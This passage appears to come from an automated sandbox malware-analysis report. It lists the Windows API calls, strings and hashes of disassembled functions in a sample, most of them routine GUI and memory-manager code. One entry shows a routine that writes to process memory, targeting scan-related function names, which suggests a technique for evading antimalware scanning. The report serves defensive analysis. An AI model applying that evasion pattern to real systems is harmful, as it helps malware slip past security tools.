                                                                                                      • Part of subcall function 0412614C: ReleaseDC.USER32(00000000,00000000), ref: 041261F0
                                                                                                    • SelectPalette.GDI32(?,?,000000FF), ref: 04125B97
                                                                                                    • RealizePalette.GDI32(?), ref: 04125BA6
                                                                                                    • GetDeviceCaps.GDI32(?,0000000C), ref: 04125BB8
                                                                                                    • GetDeviceCaps.GDI32(?,0000000E), ref: 04125BC7
                                                                                                    • GetBrushOrgEx.GDI32(?,?,0000000E,00000000,?,0000000C), ref: 04125BFA
                                                                                                    • SetStretchBltMode.GDI32(?,00000004), ref: 04125C08
                                                                                                    • SetBrushOrgEx.GDI32(?,?,?,?,?,00000004,?,?,0000000E,00000000,?,0000000C), ref: 04125C20
                                                                                                    • SetStretchBltMode.GDI32(00000000,00000003), ref: 04125C3D
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 04125C9E
                                                                                                    • SelectObject.GDI32(?,?), ref: 04125CB3
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 04125D12
                                                                                                    • DeleteDC.GDI32(00000000), ref: 04125D21
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDevice$PaletteSelect$BrushCreateModeObjectStretch$CompatibleDeleteHalftoneRealizeRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2414602066-0
                                                                                                    • Opcode ID: c908145c6b95628cd008c34645e2cd8d7b72b7120d74dcc87337c9509c09ff9d
                                                                                                    • Instruction ID: 478c3d0064109dad6713f1b3c09d3f31df70b67168f38e641b0e7b5791f76018
                                                                                                    • Opcode Fuzzy Hash: c908145c6b95628cd008c34645e2cd8d7b72b7120d74dcc87337c9509c09ff9d
                                                                                                    • Instruction Fuzzy Hash: 76710675B04215BFEB50DBA8CAC5E5ABBF9AB08204F148594B508EB281D775FD20CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 04123527
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 04123531
                                                                                                    • GetObjectA.GDI32(?,00000018,?), ref: 04123551
                                                                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 04123568
                                                                                                    • GetDC.USER32(00000000), ref: 04123574
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 041235A1
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 041235C7
                                                                                                    • SelectObject.GDI32(?,?), ref: 041235E2
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 041235F1
                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0412361D
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 0412362B
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 04123639
                                                                                                    • DeleteDC.GDI32(?), ref: 0412364F
                                                                                                    • DeleteDC.GDI32(?), ref: 04123658
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                                    • String ID:
                                                                                                    • API String ID: 644427674-0
                                                                                                    • Opcode ID: e57d155fe7b4c6475c053dc72b2f04a35449e35465a12556db4c4bed9c23e883
                                                                                                    • Instruction ID: 3b76859ee1d5bbf872e7154670bad2383a7716a60c6484559db972c7dac9b33a
                                                                                                    • Opcode Fuzzy Hash: e57d155fe7b4c6475c053dc72b2f04a35449e35465a12556db4c4bed9c23e883
                                                                                                    • Instruction Fuzzy Hash: 1C41EC71E04259AFEB10EBE8CD85FAEB7FCEB08704F114455BA14E7280D7B5BA108B60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • FindWindowA.USER32(MouseZ,Magellan MSWHEEL), ref: 04107454
                                                                                                    • RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 04107460
                                                                                                    • RegisterWindowMessageA.USER32(MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 0410746F
                                                                                                    • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,MSH_WHEELSUPPORT_MSG,MSWHEEL_ROLLMSG), ref: 0410747B
                                                                                                    • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 04107493
                                                                                                    • SendMessageA.USER32(00000000,?,00000000,00000000), ref: 041074B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Window$Register$Send$Find
                                                                                                    • String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
                                                                                                    • API String ID: 3569030445-3736581797
                                                                                                    • Opcode ID: f3cad5aa537f49a3ad46c0b903df245e6c2be9848adc2838a6324e5e94116fe6
                                                                                                    • Instruction ID: 953298350e4ebfb013e78c36ad6f6546a06a714050ecc20aba057cf406590f20
                                                                                                    • Opcode Fuzzy Hash: f3cad5aa537f49a3ad46c0b903df245e6c2be9848adc2838a6324e5e94116fe6
                                                                                                    • Instruction Fuzzy Hash: 8011D671244306AFE715AFA5DCC1B6ABBE8EF44714F10C465B9648B2C0E7F0B9408B60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0412DDAF
                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0412DDCA
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 0412DDDF
                                                                                                    • GetWindowDC.USER32(00000000,?,?,?,00000000,?), ref: 0412DDED
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 0412DE1E
                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 0412DE33
                                                                                                    • GetSystemMetrics.USER32(00000003), ref: 0412DE3C
                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0412DE4B
                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0412DE78
                                                                                                    • FillRect.USER32(?,?,00000000), ref: 0412DE86
                                                                                                    • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0412DEEF,?,00000000,?,?,?,00000000,?), ref: 0412DEAB
                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0412DEE9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 19621357-0
                                                                                                    • Opcode ID: ec2b13f85150ee58d24d9be92ee3fb84502230e6362c87a61b3ade12b2581dc6
                                                                                                    • Instruction ID: 5889d56d7f1abb70bd5abc220afa533075a103efa98e550524f6c9ac29fea5c0
                                                                                                    • Opcode Fuzzy Hash: ec2b13f85150ee58d24d9be92ee3fb84502230e6362c87a61b3ade12b2581dc6
                                                                                                    • Instruction Fuzzy Hash: 51412971A00159ABEB00EBE8DD85EEFB7BDAF49218F104661F914F72D0CB71BA458760
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 0410296A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                    • API String ID: 2030045667-32948583
                                                                                                    • Opcode ID: debd83348baecd8e0868a81f6d6a7e851e65e1328c69eec710234e54616a94f2
                                                                                                    • Instruction ID: ddec57f3ccfdcbd9cdef51dcadb450023e422a213621e2abb28cf077868c05d1
                                                                                                    • Opcode Fuzzy Hash: debd83348baecd8e0868a81f6d6a7e851e65e1328c69eec710234e54616a94f2
                                                                                                    • Instruction Fuzzy Hash: 06A1B530B042648BEF21AA6CC8C8BD8B7E5FB09714F1481E5E549AB2C1DFF5AD85CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • EnumDisplayMonitors.USER32(?,?,?,?), ref: 0412B285
                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 0412B2AA
                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 0412B2B5
                                                                                                    • GetClipBox.GDI32(?,?), ref: 0412B2C7
                                                                                                    • GetDCOrgEx.GDI32(?,?), ref: 0412B2D4
                                                                                                    • OffsetRect.USER32(?,?,?), ref: 0412B2ED
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 0412B2FE
                                                                                                    • IntersectRect.USER32(?,?,?), ref: 0412B314
                                                                                                      • Part of subcall function 0412ACA4: GetProcAddress.KERNEL32(75A50000,00000000), ref: 0412AD23
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                                                                                                    • String ID: EnumDisplayMonitors
                                                                                                    • API String ID: 362875416-2491903729
                                                                                                    • Opcode ID: 68481912eb75e7e0e607096c49ca97f15343e5008db0f0d04412518718066c90
                                                                                                    • Instruction ID: 56ea53f2b607fc771e72e21dfbbefaa5514ec2813ddbcbac3504b1cc0d6e4662
                                                                                                    • Opcode Fuzzy Hash: 68481912eb75e7e0e607096c49ca97f15343e5008db0f0d04412518718066c90
                                                                                                    • Instruction Fuzzy Hash: B9313E72A04259AFEB10DEA5DAC49EF77BCEF09210F048166E915E2140E738F954CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 04158D04
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 04158D1B
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 04158D21
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 04158DAF
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 04158DBB
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 04158DCF
                                                                                                    Strings
                                                                                                    • C:\Windows\System32\KernelBase.dll, xrefs: 04158D16
                                                                                                    • LoadLibraryExA, xrefs: 04158D11
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Read$AddressHandleModuleProc
                                                                                                    • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                    • API String ID: 1061262613-1650066521
                                                                                                    • Opcode ID: 804db9a462bcdc3ea0f80a96ccdfd924d67b70fef77c12a1f3be5961ac6aad9f
                                                                                                    • Instruction ID: 0b84e360dbe138202a986d3d8649f48ca3a58956f2bef15fef2e03eaca2e41b9
                                                                                                    • Opcode Fuzzy Hash: 804db9a462bcdc3ea0f80a96ccdfd924d67b70fef77c12a1f3be5961ac6aad9f
                                                                                                    • Instruction Fuzzy Hash: 46313CB1600305FBEB20EF68CCC5F9AB7E8AF15728F044150EE24AB2D1D770B9608B64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0413FF37
                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?), ref: 0413FF5B
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0413FF66
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 0413FF6D
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 0413FF7D
                                                                                                    • BeginPaint.USER32(00000000,?,00000000,0414003E,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0413FF9F
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0413FFFB
                                                                                                    • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0414000C
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 04140026
                                                                                                    • DeleteDC.GDI32(00000000), ref: 0414002F
                                                                                                    • DeleteObject.GDI32(?), ref: 04140038
                                                                                                      • Part of subcall function 0413F8F4: BeginPaint.USER32(00000000,?), ref: 0413F91F
                                                                                                      • Part of subcall function 0413F8F4: EndPaint.USER32(00000000,?,0413FA5A), ref: 0413FA4D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 3867285559-0
                                                                                                    • Opcode ID: ba1f7bab0bbb52822a824d4030fce0a0468124b1a396f16c32fe5c6ba0d9cc5e
                                                                                                    • Instruction ID: 74f79620ad989fae9310583b67b7313c235f9ec455884ac16ed83e11c93051b1
                                                                                                    • Opcode Fuzzy Hash: ba1f7bab0bbb52822a824d4030fce0a0468124b1a396f16c32fe5c6ba0d9cc5e
                                                                                                    • Instruction Fuzzy Hash: C441C975B00204ABDB14EBA8CDC4B9EB7F8EB49709F1084A9B909DB281DB75ED05CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • IsWindowUnicode.USER32(?), ref: 04136E9E
                                                                                                    • SetWindowLongW.USER32(?,000000FC,?), ref: 04136EB9
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 04136EC4
                                                                                                    • GetWindowLongW.USER32(?,000000F4), ref: 04136ED6
                                                                                                    • SetWindowLongW.USER32(?,000000F4,?), ref: 04136EE9
                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 04136F02
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 04136F0D
                                                                                                    • GetWindowLongA.USER32(?,000000F4), ref: 04136F1F
                                                                                                    • SetWindowLongA.USER32(?,000000F4,?), ref: 04136F32
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 04136F49
                                                                                                    • SetPropA.USER32(?,00000000,00000000), ref: 04136F60
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$Prop$Unicode
                                                                                                    • String ID:
                                                                                                    • API String ID: 1693715928-0
                                                                                                    • Opcode ID: 236349be675f95289b80407340b2a3cfae66be58a44a26b1737455f0068c9786
                                                                                                    • Instruction ID: 599ae596f58d1108eddae5e2efa69548f298edac9783f0e61e91c3d2ad7b95b5
                                                                                                    • Opcode Fuzzy Hash: 236349be675f95289b80407340b2a3cfae66be58a44a26b1737455f0068c9786
                                                                                                    • Instruction Fuzzy Hash: 4A319A75504258BBEF10DF99DC94EAA37ECAB09268F108650FE24CB2D1D774F940DB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,UacScan,0419A350,0415B464,OpenSession,0419A350,0415B464,ScanBuffer,0419A350,0415B464,00000000,0415B44C), ref: 0415AF47
                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0415AF4D
                                                                                                      • Part of subcall function 0411FD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD70
                                                                                                      • Part of subcall function 0411FD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FD7E
                                                                                                      • Part of subcall function 0411FD38: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 0411FD97
                                                                                                      • Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB3
                                                                                                      • Part of subcall function 0411FD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000,0411FE14), ref: 0411FDB9
                                                                                                      • Part of subcall function 0411FD38: GetCurrentProcess.KERNEL32(0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE3
                                                                                                      • Part of subcall function 0411FD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000,00000000), ref: 0411FDE9
                                                                                                      • Part of subcall function 0411FD38: FreeLibrary.KERNEL32(74AD0000,00000000,0419A35C,Function_00006ADC,00000004,0419A360,00000000,0419A35C,17D783FC,00000040,00000004,74AD0000,00000000,00000000,00000000,00000000), ref: 0411FDF4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressCurrentHandleLibraryMemoryModuleProcProcessVirtual$FreeLoadProtectWrite
                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                    • API String ID: 327143009-4174081549
                                                                                                    • Opcode ID: ef74555b1958a30fecbe061b0427957c6ce93d11f6eabbb6892b2de35df285e5
                                                                                                    • Instruction ID: e722cd9836957e4da6a97a9e8ad2276f71dd2a5b411a140ca2cb27616f868b8e
                                                                                                    • Opcode Fuzzy Hash: ef74555b1958a30fecbe061b0427957c6ce93d11f6eabbb6892b2de35df285e5
                                                                                                    • Instruction Fuzzy Hash: 0DF12C31A01119DBEB14EBA4C9C0FDEB3B9EF44208F11C1B5E609AB264DB70BE468F55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • RectVisible.GDI32(00000000,?), ref: 0413FBA4
                                                                                                    • SaveDC.GDI32(00000000), ref: 0413FBC7
                                                                                                    • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0413FC07
                                                                                                    • RestoreDC.GDI32(00000000,00000000), ref: 0413FC33
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Rect$ClipIntersectRestoreSaveVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 1976014923-0
                                                                                                    • Opcode ID: 0dc8e4228785b1b3e06613f681e9dc6f19657e2bcf3b79742d45b4a14b69fdf3
                                                                                                    • Instruction ID: 9c14e2b3c0f2b33f4b09b98e2497d9a3dc9bc38d586cbc364b3093fc456c3e5a
                                                                                                    • Opcode Fuzzy Hash: 0dc8e4228785b1b3e06613f681e9dc6f19657e2bcf3b79742d45b4a14b69fdf3
                                                                                                    • Instruction Fuzzy Hash: 8991E474A042499FDB05DFA8C4C4FAEBBF8AF08314F1440E5EA44AB296D775E985CB50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetSystemMenu.USER32(00000000,00000000), ref: 0414F143
                                                                                                    • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 0414F161
                                                                                                    • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0414F16E
                                                                                                    • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0414F17B
                                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0414F188
                                                                                                    • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0414F195
                                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0414F1A2
                                                                                                    • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0414F1AF
                                                                                                    • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 0414F1CD
                                                                                                    • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 0414F1E9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$Delete$EnableItem$System
                                                                                                    • String ID:
                                                                                                    • API String ID: 3985193851-0
                                                                                                    • Opcode ID: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
                                                                                                    • Instruction ID: 4fbd0cbc6265a458143d94e133916b82897d462750baff5a986f62192ed57d16
                                                                                                    • Opcode Fuzzy Hash: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
                                                                                                    • Instruction Fuzzy Hash: 2521EF70384354BAF720EB28CCCDF597BD99B14B18F0580A0B6486F6D2C7F5BA518714
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    • The unexpected small block leaks are:, xrefs: 041027A3
                                                                                                    • An unexpected memory leak has occurred. , xrefs: 0410272C
                                                                                                    • Unexpected Memory Leak, xrefs: 0410295C
                                                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 041028E5
                                                                                                    • 7, xrefs: 0410273D
                                                                                                    • , xrefs: 041028B0
                                                                                                    • bytes: , xrefs: 041027F9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2007665552.0000000004101000.00000020.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2007627273.0000000004100000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000416A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2007962545.000000000428E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_4100000_PCMNil7wkU.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
